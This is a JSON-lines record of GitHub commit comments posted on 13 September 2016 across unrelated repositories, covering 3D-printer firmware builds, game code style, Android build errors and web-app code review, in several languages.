{"id":"4552863623","type":"CommitCommentEvent","actor":{"login":"dcnewman"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18994575,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-13T01:10:38Z","updated_at":"2016-09-13T01:10:38Z","body":"On 12/09/2016 5:16 PM, caall99 wrote:\n> Updated and built avr-gcc 4.9.2. I was able to flash the built firmware, but my printer is showing a blank screen.\n\nDid you build for the correct machine type?  If you put Rep 2 / 2X firmware on a Rep 1 /Rep 1 clone, you won't see\nthe LCD. And vice versa: Rep 1 / Rep 1 clone firmware on a Rep 2 / 2X.  Even more exciting if you build for an Azteeg.\n\nDan\n\n"}},"created_at":"2016-09-13T01:10:38Z"}
{"id":"4552863670","type":"CommitCommentEvent","actor":{"login":"111pontes"},"repo":{"name":"111pontes/ydk-gen"},"payload":{"comment":{"id":18994576,"position":82,"line":66,"path":"sdk/python/README.rst","commit_id":"e5328ffabd434da062ffa380e15871010eca64d9","created_at":"2016-09-13T01:10:39Z","updated_at":"2016-09-13T01:10:39Z","body":"Don't see an advantage of using `-bundle` prefix. [YDK-Py samples](https://github.com/CiscoDevNet/ydk-py-samples) will start using the same nomenclature (cisco-ios-xr, openconfig, ietf) to group sample apps."}},"created_at":"2016-09-13T01:10:39Z"}
{"id":"4552863825","type":"CommitCommentEvent","actor":{"login":"gladiatorAsh"},"repo":{"name":"gladiatorAsh/MVCProjectwithPlotly"},"payload":{"comment":{"id":18994578,"position":null,"line":null,"path":null,"commit_id":"a19d380ed9ffb0a0947e44eeb0e350388b6ec8c9","created_at":"2016-09-13T01:10:42Z","updated_at":"2016-09-13T01:10:42Z","body":"Created complete project and committed it."}},"created_at":"2016-09-13T01:10:42Z"}
{"id":"4552868854","type":"CommitCommentEvent","actor":{"login":"keyurtechy"},"repo":{"name":"keyurtechy/mattercenter"},"payload":{"comment":{"id":18994599,"position":null,"line":null,"path":null,"commit_id":"72feada7566b68f9a4fea3ce04b239d85e900792","created_at":"2016-09-13T01:12:25Z","updated_at":"2016-09-13T01:12:25Z","body":"Changes to resolve 1213401 and Bug 1209059\r\nChanges for Date filter functionality  to work as per expected in Matters and Document Search page."}},"created_at":"2016-09-13T01:12:25Z"}
{"id":"4552869113","type":"CommitCommentEvent","actor":{"login":"Rheenabyte"},"repo":{"name":"Rheenabyte/RheenCore"},"payload":{"comment":{"id":18994601,"position":null,"line":null,"path":null,"commit_id":"fb9f9123912831f755b3914a446a6a6d23457740","created_at":"2016-09-13T01:12:31Z","updated_at":"2016-09-13T01:12:31Z","body":"Yeah, I still don't know why you need a newline at the end of files. Googling that now."}},"created_at":"2016-09-13T01:12:31Z"}
{"id":"4552871568","type":"CommitCommentEvent","actor":{"login":"3xp0n3nt"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18994607,"position":30,"line":59,"path":"core/src/main/java/com/forerunnergames/peril/core/model/battle/DefaultAttackOrder.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T01:13:22Z","updated_at":"2016-09-13T01:13:22Z","body":"You mean the way equals is expressed? I never really explained my standard for equals. IntelliJ does suggest some inlining of boolean logic, so the way you see equals expressed is the way I implement it project-wide.\r\n\r\n```\r\npublic boolean equals (final Object obj)\r\n{\r\n  if (!(obj instanceof AttackOrder)) return false;\r\n  return ((AttackOrder) obj).getId ().equals (attackOrderId);\r\n}\r\n```\r\n\r\nAs for the other stuff in this class, I clean up code as I'm working, so for example, as I'm having to fix some core code, I fix code style issues, for example, unnecessary uses of `this`, running auto-format, etc. I believe in leaving the code better than I found it, and it only takes a few seconds. I notice that if I try and put this off by making a note to do it later, it usually never gets done, so why wait? I do agree that this entire commit is another \"big one\", which is bad. It doesn't seem practical or realistic to me to try and separate formatting changes into their own commits, unless it's something on a fairly large scale, affecting many files at once.\r\n\r\nI also have IntelliJ set to order `@Override` methods in declaration order, i.e., the order the methods are listed in the interface. That's project standard. I hope you can configure Eclipse to do likewise. That's why equals & hashcode switched places - because hashcocde in Object is listed before equals.\r\n\r\nSo I don't see any of the changes as arbitrary, just conforming to project standards. Equals implementation is debatable, but I prefer the minimalist approach see here."}},"created_at":"2016-09-13T01:13:22Z"}
{"id":"4552873240","type":"CommitCommentEvent","actor":{"login":"FrederikWeitz"},"repo":{"name":"FrederikWeitz/Hello-World"},"payload":{"comment":{"id":18994614,"position":2,"line":2,"path":"README.md","commit_id":"9776ece430c704002482c36d1a1d65e203f80c21","created_at":"2016-09-13T01:13:55Z","updated_at":"2016-09-13T01:13:55Z","body":"Was kann ich alles damit machen?"}},"created_at":"2016-09-13T01:13:55Z"}
{"id":"4552873262","type":"CommitCommentEvent","actor":{"login":"DoctorWiggles"},"repo":{"name":"Silentine/GrimoireOfGaia"},"payload":{"comment":{"id":18994615,"position":null,"line":null,"path":null,"commit_id":"8c8ddaf3505d25109ecbde79f7f16e3499ac0eea","created_at":"2016-09-13T01:13:55Z","updated_at":"2016-09-13T01:13:55Z","body":"![2016-09-12_18 01 02](https://cloud.githubusercontent.com/assets/10700823/18458170/cb4ff0d4-7913-11e6-90dd-3a68c3e8ec17.png)\r\nNo more having to individually spawn them all by hand for testing\r\nType in the text messege command /gaia spawn [mob, npc]\r\nTo spawn all monsters, or npcs respectivly.\r\n\r\nSyntax:\r\n[gaia, Gaia, gog, Gog] + [spawn, summon] + [mob, mobs, npc, npcs]\r\n"}},"created_at":"2016-09-13T01:13:55Z"}
{"id":"4552881206","type":"CommitCommentEvent","actor":{"login":"JBCDroid2"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":18994637,"position":null,"line":null,"path":null,"commit_id":"33b8fba461618bc8ba3ad20026fbbdc4df7f601c","created_at":"2016-09-13T01:16:44Z","updated_at":"2016-09-13T01:16:44Z","body":"ERROR\r\nframeworks/base/core/java/android/provider/Settings.java:3705: error: variable VOLUME_ADJUST_SOUNDS_ENABLED is already defined in class System\r\n        public static final String VOLUME_ADJUST_SOUNDS_ENABLED = \"volume_adjust_sounds_enabled\";\r\n"}},"created_at":"2016-09-13T01:16:44Z"}
{"id":"4552885501","type":"CommitCommentEvent","actor":{"login":"Jenly"},"repo":{"name":"Jenly/android_cm_device_xiaomi_aries"},"payload":{"comment":{"id":18994641,"position":null,"line":null,"path":null,"commit_id":"7a8c83a3e9a5048c962f76c44b2a67aaa37282ce","created_at":"2016-09-13T01:18:17Z","updated_at":"2016-09-13T01:18:17Z","body":"So sorry .The tree is not work, you can look it , https://github.com/bywwh/android_device_xiaomi_aries"}},"created_at":"2016-09-13T01:18:17Z"}
{"id":"4552885714","type":"CommitCommentEvent","actor":{"login":"3xp0n3nt"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18994642,"position":23,"line":23,"path":"core/src/main/java/com/forerunnergames/peril/core/model/state/events/BattleResultContinueEvent.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T01:18:21Z","updated_at":"2016-09-13T01:18:21Z","body":"Yeah, sorry, this commit was being worked on over the course of a month, with many long breaks in between sessions. Normally, I'll explain everything, but I didn't feel like it was worth it this time - would have taken most of my day to write the commit message, and I just wanted to get this pushed very badly as soon as it was working.\r\n\r\nThe PlayerAttack[Victory/Defeat/Indecisive]Event's were not necessary to be sent to the client, so I made them StateEvent's, and moved them to core. Then due to other changes (mainly BattleOutcome enum), they were renamed for project-wide consistency. So, it's a rename + move."}},"created_at":"2016-09-13T01:18:21Z"}
{"id":"4552887305","type":"CommitCommentEvent","actor":{"login":"caall99"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18994650,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-13T01:18:52Z","updated_at":"2016-09-13T01:18:52Z","body":"Lol! I got it working. But i had to use the 4.9.2 tool chain. I also changed optimization from -Os to -O2. It didn't like it when i changed optimization settings in two locations of the file -that's what caused the blank screen. Heating up right now - about to print something I printed earlier, which is a perfect test to see if the hammering got fixed!"}},"created_at":"2016-09-13T01:18:52Z"}
{"id":"4552892177","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18994656,"position":15,"line":32,"path":"static/js/controllers/contacts-content.js","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-13T01:20:38Z","updated_at":"2016-09-13T01:20:38Z","body":"Subtracting the weeks will be done quite frequently. It mightn't be very expensive, but consider changing `$scope.setTasksWeeksBack` to store something like `$scope.tasksStartDate = moment().subtract(i, 'weeks')` so you only do it once per user interaction."}},"created_at":"2016-09-13T01:20:38Z"}
{"id":"4552892954","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18994657,"position":22,"line":39,"path":"static/js/controllers/contacts-content.js","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-13T01:20:53Z","updated_at":"2016-09-13T01:20:53Z","body":"`i` isn't very descriptive. `months` would be better?"}},"created_at":"2016-09-13T01:20:53Z"}
{"id":"4552894642","type":"CommitCommentEvent","actor":{"login":"emperorstarfinder"},"repo":{"name":"Virtual-Universe/Experimental-Viewer"},"payload":{"comment":{"id":18994663,"position":null,"line":null,"path":null,"commit_id":"5c01935ef25f9acce2346026853d1aaec952fdb0","created_at":"2016-09-13T01:21:29Z","updated_at":"2016-09-13T01:21:29Z","body":"Ahhh okay, I will update your grid info in the viewer default grid list then to be sure its correct.  Virtual Universe Version 1.0.3 is in development.  Please feel free to test and open bug reports on the issue tracker at: https://github.com/Virtual-Universe/Virtual-Dev/issues  However please remember we do not encourage you to use the development level code on a production level grid where you are open to the public as it will potentially cause trouble.  The release schedule for version 1.0.3 is listed on the main readme on the repo."}},"created_at":"2016-09-13T01:21:29Z"}
{"id":"4552895238","type":"CommitCommentEvent","actor":{"login":"cgutman"},"repo":{"name":"moonlight-stream/moonlight-chrome"},"payload":{"comment":{"id":18994666,"position":null,"line":null,"path":null,"commit_id":"8d86bd6c5198e06af9c771d4e7b8892e24bd3d96","created_at":"2016-09-13T01:21:43Z","updated_at":"2016-09-13T01:21:43Z","body":"I'm not sure that this is complete. I was having issues with box art being misaligned (especially if a custom added app like mstsc was present). Try maximizing the window and see if you see the same issue."}},"created_at":"2016-09-13T01:21:43Z"}
{"id":"4552895258","type":"CommitCommentEvent","actor":{"login":"houkanshan"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18994667,"position":null,"line":null,"path":null,"commit_id":"56dd76c4f29d9a36011c978d57be7e0483d66070","created_at":"2016-09-13T01:21:43Z","updated_at":"2016-09-13T01:21:43Z","body":"你看下你输入的是不是 tab ？ 编辑器需要按这个 https://github.com/SerotoninPharmaceuticals/LD36/blob/master/.editorconfig 配置下。或者支持 EditorConfig (http://editorconfig.org/) 的话，装个插件就行"}},"created_at":"2016-09-13T01:21:43Z"}
{"id":"4552896496","type":"CommitCommentEvent","actor":{"login":"Seandor"},"repo":{"name":"Seandor/Think-Angularjs"},"payload":{"comment":{"id":18994672,"position":6,"line":6,"path":"lesson01/src/app.js","commit_id":"b076a10fed5a1f532a798c13b8e1d7a9b3614a4b","created_at":"2016-09-13T01:22:06Z","updated_at":"2016-09-13T01:22:06Z","body":"这种写法避免了nested  callback，使代码可读性更强。"}},"created_at":"2016-09-13T01:22:06Z"}
{"id":"4552898258","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":18994675,"position":null,"line":null,"path":null,"commit_id":"0ef09c338a17e53e7ca20b257db4a4a8160c5b58","created_at":"2016-09-13T01:22:45Z","updated_at":"2016-09-13T01:22:45Z","body":"[R/util.R:19:20:](https://github.com/jackwasey/icd/blob/0ef09c338a17e53e7ca20b257db4a4a8160c5b58/R/util.R#L19) *style:* **Use <-, not =, for assignment.**\n```r\n​.have_regexec_perl = \"perl\" %in% names(as.list(regexec))\n                   ^\n```"}},"created_at":"2016-09-13T01:22:45Z"}
{"id":"4552898777","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18994677,"position":5,"line":98,"path":"templates/partials/contacts_content.html","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-13T01:22:56Z","updated_at":"2016-09-13T01:22:56Z","body":"Without padding links are very hard to click on mobile (especially Tecnos). Generally I use `class=\"btn btn-link\"` which adds a bootstrap class with padding and is styled consistently throughout the app."}},"created_at":"2016-09-13T01:22:56Z"}
{"id":"4552900143","type":"CommitCommentEvent","actor":{"login":"jh10422"},"repo":{"name":"jh10422/ROV2017"},"payload":{"comment":{"id":18994681,"position":null,"line":null,"path":null,"commit_id":"82965e93834457457cc483c637bd84485421b63f","created_at":"2016-09-13T01:23:24Z","updated_at":"2016-09-13T01:23:24Z","body":"dead overheating"}},"created_at":"2016-09-13T01:23:24Z"}
{"id":"4552903140","type":"CommitCommentEvent","actor":{"login":"ShadowBullet"},"repo":{"name":"moonlight-stream/moonlight-chrome"},"payload":{"comment":{"id":18994688,"position":null,"line":null,"path":null,"commit_id":"8d86bd6c5198e06af9c771d4e7b8892e24bd3d96","created_at":"2016-09-13T01:24:29Z","updated_at":"2016-09-13T01:24:29Z","body":"@cgutman your right, maximizing the window does fix the issue. I am about to compile a new build to see if the issue was fixed without maximizing the window"}},"created_at":"2016-09-13T01:24:29Z"}
{"id":"4552903897","type":"CommitCommentEvent","actor":{"login":"TheAxeMan301"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18994691,"position":59,"line":43,"path":"object-browser-schema.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-13T01:24:46Z","updated_at":"2016-09-13T01:24:46Z","body":"The reason is to allow for this to work with all the buttons including the info bar where the create button is usually always enabled.\r\n\r\nIt's true, the `never` option seems a little funny. But then so do a lot of the UX team's ideas. It should be easy to implement and might have a purpose so why limit ourselves?"}},"created_at":"2016-09-13T01:24:46Z"}
{"id":"4552904707","type":"CommitCommentEvent","actor":{"login":"muffato"},"repo":{"name":"bioperl/bioperl-live"},"payload":{"comment":{"id":18994693,"position":null,"line":null,"path":null,"commit_id":"e5023eef64adfb4e41598670c14d4e99789ea37c","created_at":"2016-09-13T01:25:04Z","updated_at":"2016-09-13T01:25:04Z","body":"I think the same bug is on the v1.6.x branch. Can this commit be cherry-picked, please ?\r\n\r\nMatthieu"}},"created_at":"2016-09-13T01:25:04Z"}
{"id":"4552904843","type":"CommitCommentEvent","actor":{"login":"raidancampbell"},"repo":{"name":"moonlight-stream/moonlight-chrome"},"payload":{"comment":{"id":18994694,"position":null,"line":null,"path":null,"commit_id":"8d86bd6c5198e06af9c771d4e7b8892e24bd3d96","created_at":"2016-09-13T01:25:07Z","updated_at":"2016-09-13T01:25:07Z","body":"gah, fine, now I gotta hook everything up to make the computer work again :P"}},"created_at":"2016-09-13T01:25:07Z"}
{"id":"4552905160","type":"CommitCommentEvent","actor":{"login":"3xp0n3nt"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18994695,"position":23,"line":23,"path":"core/src/main/java/com/forerunnergames/peril/core/model/state/events/BattleResultContinueEvent.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T01:25:13Z","updated_at":"2016-09-13T01:25:13Z","body":"Regarding changes outside of client:\r\n\r\nIt looks like a lot of stuff, but 80% is trivial (minor refactoring / code cleanup).\r\n\r\nThe most significant change was the addition of BattleOutcome, which eliminated a ton of pain points throughout the project, and imo simplified the battle system significantly.\r\n\r\nThe only other significant changes were multiple critical bugfixes in GameModel."}},"created_at":"2016-09-13T01:25:13Z"}
{"id":"4552905512","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18994696,"position":null,"line":null,"path":null,"commit_id":"ad5bb1a76ea6c8e8db801f7452f70bec24737a53","created_at":"2016-09-13T01:25:20Z","updated_at":"2016-09-13T01:25:20Z","body":"currently, we cannot convert `undefined` to a string\r\n\r\nstoring offsets as strings solves a problem because `0` behaves as false in JavaScript, while `\"0\"` behaves as true. This fixes an anomaly in which, when a user positioned a Pico's rounded rectangle at the very top (an offset of zero) the code took that to be undefined and placed its top at the default value of 50"}},"created_at":"2016-09-13T01:25:20Z"}
{"id":"4552907683","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18994703,"position":null,"line":null,"path":null,"commit_id":"daa3e088eddfddef39e736a8902164d266f261d3","created_at":"2016-09-13T01:26:08Z","updated_at":"2016-09-13T01:26:08Z","body":"Lol this looks confusing. Can you meet Wednesday?"}},"created_at":"2016-09-13T01:26:08Z"}
{"id":"4552909994","type":"CommitCommentEvent","actor":{"login":"emperorstarfinder"},"repo":{"name":"Virtual-Universe/Experimental-Viewer"},"payload":{"comment":{"id":18994710,"position":null,"line":null,"path":null,"commit_id":"5c01935ef25f9acce2346026853d1aaec952fdb0","created_at":"2016-09-13T01:26:57Z","updated_at":"2016-09-13T01:26:57Z","body":"Grid info corrected thanks :)"}},"created_at":"2016-09-13T01:26:57Z"}
{"id":"4552911525","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":18994716,"position":null,"line":null,"path":null,"commit_id":"856379241eae3d12ed3dd534866bf2e5abb0eaaa","created_at":"2016-09-13T01:27:27Z","updated_at":"2016-09-13T01:27:27Z","body":"문제라기 보단 이미 있는 라이브러리가 있다면 그걸 사용하는게 복잡도를 낮추는 길이라서요. 검토만 해보시라고 드린 커멘트 입니다 :)"}},"created_at":"2016-09-13T01:27:27Z"}
{"id":"4552911841","type":"CommitCommentEvent","actor":{"login":"JBCDroid2"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":18994718,"position":null,"line":null,"path":null,"commit_id":"33b8fba461618bc8ba3ad20026fbbdc4df7f601c","created_at":"2016-09-13T01:27:34Z","updated_at":"2016-09-13T01:27:34Z","body":"ERROR\r\nframeworks/base/core/java/android/provider/Settings.java:3705: error: variable VOLUME_ADJUST_SOUNDS_ENABLED is already defined in class System\r\npublic static final String VOLUME_ADJUST_SOUNDS_ENABLED = \"volume_adjust_sounds_enabled\";\r\n\r\nthis command is set in two rows\r\nline 3681\r\nline 3705"}},"created_at":"2016-09-13T01:27:34Z"}
{"id":"4552919190","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18994741,"position":5,"line":679,"path":"translations/messages-en.properties","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-13T01:30:14Z","updated_at":"2016-09-13T01:30:14Z","body":"This isn't very reusable and it very difficult to change if we decide \"2 weeks\" should be \"3 weeks\". I know we're not great at pluralisation generally but the best I've come up with is...\r\n```\r\ncount.weeks.singular = {{count}} week\r\ncount.weeks.plural = {{count}} weeks\r\n```\r\n\r\nThen change your links to...\r\n\r\n`<a ng-click=\"setTaskWeeksBack(2)\" translate translate-values=\"{ count: 2 }\">count.weeks.plural</a>`\r\n\r\n(That's off the top of my head - YMMV).\r\n\r\nYou can go one step further and have an array of filters that you loop over in the UI but with only 3 options that's probably not that useful...\r\n\r\nOtherwise, investigate going for the gold standard and do: https://github.com/medic/medic-webapp/issues/2712 (it shouldn't be too hard to just do)."}},"created_at":"2016-09-13T01:30:14Z"}
{"id":"4552919920","type":"CommitCommentEvent","actor":{"login":"3xp0n3nt"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18994742,"position":23,"line":23,"path":"core/src/main/java/com/forerunnergames/peril/core/model/state/events/BattleResultContinueEvent.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T01:30:26Z","updated_at":"2016-09-13T01:30:26Z","body":"common::event changes were mainly to allow client battle phase handler to deal directly with `BattleSetupEvent` & `BattleResultEvent`, which worked out very nicely. If you look at the before-and-after of the client battle phase handlers, I was able to reduce the amount of code by more than half, and the complexity reduction is difficult to measure but is HUGE. That's why battles just work now. When my brother & I played through a game before the battle system redesign, it was a mess - there were so many bugs it was ridiculous - it was a miracle I managed to hack the code together enough to make it work. Now, it's smooth as a baby's bottom. I also figured out a way to force LibGDX to continue running my code in an inactive window. ;-)"}},"created_at":"2016-09-13T01:30:26Z"}
{"id":"4552924015","type":"CommitCommentEvent","actor":{"login":"Joeper214"},"repo":{"name":"skyarch-networks/skyhopper"},"payload":{"comment":{"id":18994753,"position":4,"line":10,"path":"app/controllers/app_settings_controller.rb","commit_id":"02d1744436d4b8c6a951087c451976158eb7fab9","created_at":"2016-09-13T01:31:52Z","updated_at":"2016-09-13T01:31:52Z","body":"Authenticate User should exclude `AppSettingsController#chef_create`  as it also causes `HTTP Error 401 - Unauthorized`"}},"created_at":"2016-09-13T01:31:52Z"}
{"id":"4552924617","type":"CommitCommentEvent","actor":{"login":"Joeper214"},"repo":{"name":"skyarch-networks/skyhopper"},"payload":{"comment":{"id":18994757,"position":4,"line":10,"path":"app/controllers/app_settings_controller.rb","commit_id":"02d1744436d4b8c6a951087c451976158eb7fab9","created_at":"2016-09-13T01:32:04Z","updated_at":"2016-09-13T01:32:04Z","body":"Wbhat do you think @root-beer ?"}},"created_at":"2016-09-13T01:32:04Z"}
{"id":"4552925636","type":"CommitCommentEvent","actor":{"login":"Joeper214"},"repo":{"name":"skyarch-networks/skyhopper"},"payload":{"comment":{"id":18994760,"position":4,"line":10,"path":"app/controllers/app_settings_controller.rb","commit_id":"02d1744436d4b8c6a951087c451976158eb7fab9","created_at":"2016-09-13T01:32:26Z","updated_at":"2016-09-13T01:32:26Z","body":"I'll create a PR for minor fix for this."}},"created_at":"2016-09-13T01:32:26Z"}
{"id":"4552927772","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":18994768,"position":null,"line":null,"path":null,"commit_id":"2b1014ae99c892fff3030603ea14b8024b583107","created_at":"2016-09-13T01:33:13Z","updated_at":"2016-09-13T01:33:13Z","body":"强无敌！\r\n@puchai"}},"created_at":"2016-09-13T01:33:13Z"}
{"id":"4552929438","type":"CommitCommentEvent","actor":{"login":"philipbelesky"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18994769,"position":null,"line":null,"path":null,"commit_id":"2ef9e04b9d4e8d06daa62220c8549537adf354a0","created_at":"2016-09-13T01:33:50Z","updated_at":"2016-09-13T01:33:50Z","body":"Ah, thats a much more rigorous way to go about it. I imagine Jet will stick with jQuery for the foreseeable future, but I've reimplemented the warning toggle in af397a4ba69be34dc171071722d0617814125d8e without it."}},"created_at":"2016-09-13T01:33:50Z"}
{"id":"4552929507","type":"CommitCommentEvent","actor":{"login":"synnz"},"repo":{"name":"lastsunset/test"},"payload":{"comment":{"id":18994770,"position":18,"line":18,"path":"back/index.php","commit_id":"2ec100de171eb333e6abd7c3f5a601a0eab15abd","created_at":"2016-09-13T01:33:51Z","updated_at":"2016-09-13T01:33:51Z","body":"Зачем switch по одному методу? Или ты еще не закончил?)"}},"created_at":"2016-09-13T01:33:51Z"}
{"id":"4552932723","type":"CommitCommentEvent","actor":{"login":"DerOrakel"},"repo":{"name":"basdelfos/beta-osd-v2"},"payload":{"comment":{"id":18994774,"position":null,"line":null,"path":null,"commit_id":"bed1c1c80258fbaefbf1c5d035753aa4146ac966","created_at":"2016-09-13T01:34:59Z","updated_at":"2016-09-13T01:34:59Z","body":"Well your hex is pal so it's not really working here but the page is there. My ntsc compile using Arduino.cc 1.6.11 IDE has the page but shows lots of U's and freezes the OSD. See the picture attached.\r\n![vlcsnap-2016-09-13-03h34m14s095](https://cloud.githubusercontent.com/assets/21347918/18458651/f3d4c90e-7962-11e6-893b-85232aa9756d.png)\r\n"}},"created_at":"2016-09-13T01:34:59Z"}
{"id":"4552934628","type":"CommitCommentEvent","actor":{"login":"lucid2713"},"repo":{"name":"GeekInTheClass/IndieSpace_inSeoul"},"payload":{"comment":{"id":18994783,"position":null,"line":null,"path":null,"commit_id":"cd54d450aee73c9557e19de1096a76b5df9aa692","created_at":"2016-09-13T01:35:42Z","updated_at":"2016-09-13T01:35:42Z","body":"\r\na. 문래동 SPACE VAC.\r\n위치: 서울 영등포구 문래 2가 44-14 지하 1층\r\n웹사이트 주소: http://www.facebook.com/spacevac\r\n웹사이트 내의 짧은 설명: VAC.[베크]는 국내외 아티스트들의 공연, 전시 및 아티스트 익스체인지, 워크샵을 통해 경계없는 소통을 유도하고 일상 속 확장된 예술적 경험을 하기 위한 공간이다.\r\n추천이유: 작년(2015) 12월 말에 생긴 문래동의 작은 공간. 주로 무용이나 퍼포먼스 작업들이 비정기적으로 열린다. 대부분 무료 관람이며 누구나 참석 혹은 참관가능하다. 해외아티스트들의 퍼포먼스도 많이 열리며 유무료 현대무용/움직임 워크샵도 많이 열림\r\n참고: 문래동이 워낙 오래된 철공소 지역이고 이공간은 특히 간판도 안내도 별로 없는 공간이라 초행길에 헤맬 수 있음\r\n"}},"created_at":"2016-09-13T01:35:42Z"}
{"id":"4552935407","type":"CommitCommentEvent","actor":{"login":"Ichimonji10"},"repo":{"name":"rafamanzo/aur-opennebula"},"payload":{"comment":{"id":18994785,"position":null,"line":null,"path":null,"commit_id":"f32a26703ed0ede75948b838021ba2d8eb9408c7","created_at":"2016-09-13T01:36:00Z","updated_at":"2016-09-13T01:36:00Z","body":":heart:"}},"created_at":"2016-09-13T01:36:00Z"}
{"id":"4552935592","type":"CommitCommentEvent","actor":{"login":"DerOrakel"},"repo":{"name":"basdelfos/beta-osd-v2"},"payload":{"comment":{"id":18994786,"position":null,"line":null,"path":null,"commit_id":"bed1c1c80258fbaefbf1c5d035753aa4146ac966","created_at":"2016-09-13T01:36:05Z","updated_at":"2016-09-13T01:36:05Z","body":"Using fbcd1ac"}},"created_at":"2016-09-13T01:36:05Z"}
{"id":"4552936929","type":"CommitCommentEvent","actor":{"login":"anneliakm"},"repo":{"name":"anneliakm/ISQA3420Assignment1"},"payload":{"comment":{"id":18994791,"position":null,"line":null,"path":null,"commit_id":"8205447da6337ec075f8f276791c49229bec9a3b","created_at":"2016-09-13T01:36:34Z","updated_at":"2016-09-13T01:36:34Z","body":"USE CASES"}},"created_at":"2016-09-13T01:36:34Z"}
{"id":"4552937279","type":"CommitCommentEvent","actor":{"login":"synnz"},"repo":{"name":"lastsunset/test"},"payload":{"comment":{"id":18994792,"position":19,"line":5,"path":"sys/bdauth.php","commit_id":"2ec100de171eb333e6abd7c3f5a601a0eab15abd","created_at":"2016-09-13T01:36:41Z","updated_at":"2016-09-13T01:36:41Z","body":"Зачем sleep?)"}},"created_at":"2016-09-13T01:36:41Z"}
{"id":"4552938382","type":"CommitCommentEvent","actor":{"login":"technomancy"},"repo":{"name":"meric/l2l"},"payload":{"comment":{"id":18994793,"position":null,"line":null,"path":null,"commit_id":"4767c4fd3920a92f11191e615c1fd6dc8017bb58","created_at":"2016-09-13T01:37:05Z","updated_at":"2016-09-13T01:37:05Z","body":"Great opening. <3"}},"created_at":"2016-09-13T01:37:05Z"}
{"id":"4552938874","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":18994795,"position":24,"line":39,"path":"share/functions/__fish_config_interactive.fish","commit_id":"90e535f66f27e2ef39f8522840abb74db12d2f17","created_at":"2016-09-13T01:37:15Z","updated_at":"2016-09-13T01:37:15Z","body":"doh."}},"created_at":"2016-09-13T01:37:15Z"}
{"id":"4552939479","type":"CommitCommentEvent","actor":{"login":"philipbelesky"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18994798,"position":6,"line":58,"path":"tabbycat/draw/models.py","commit_id":"c2fa4e21be81e046d19c0caa6027228f21ecc55f","created_at":"2016-09-13T01:37:30Z","updated_at":"2016-09-13T01:37:30Z","body":"Looks good; the identical debates thing shouldn't be an issue."}},"created_at":"2016-09-13T01:37:30Z"}
{"id":"4552942761","type":"CommitCommentEvent","actor":{"login":"wansco"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18994809,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-13T01:38:43Z","updated_at":"2016-09-13T01:38:43Z","body":"I made some of the above changes and pushed it to my repo, but it looks like the pull request was already accepted.\r\n\r\nI think I resolved the popover message and the error messages, but am having a tough time with the progress bar. The password length is required, but the optional tests can range from 0-4 (or possibly more if the user extends the owasp tests... but I dont think we need to consider that in this scope)\r\n\r\nIf its zero optional tests, there's no point in having a progress bar. I'd argue that its really only needed if there are at minimum 2 optional tests (for 3 total tests to pass).\r\n\r\nHow would you feel about hardcoding the 3 cases of progressbar configurations (for 3, 4, & 5 total tests) and hiding the progressbar when there are fewer than 3 total tests to pass?\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-13T01:38:43Z"}
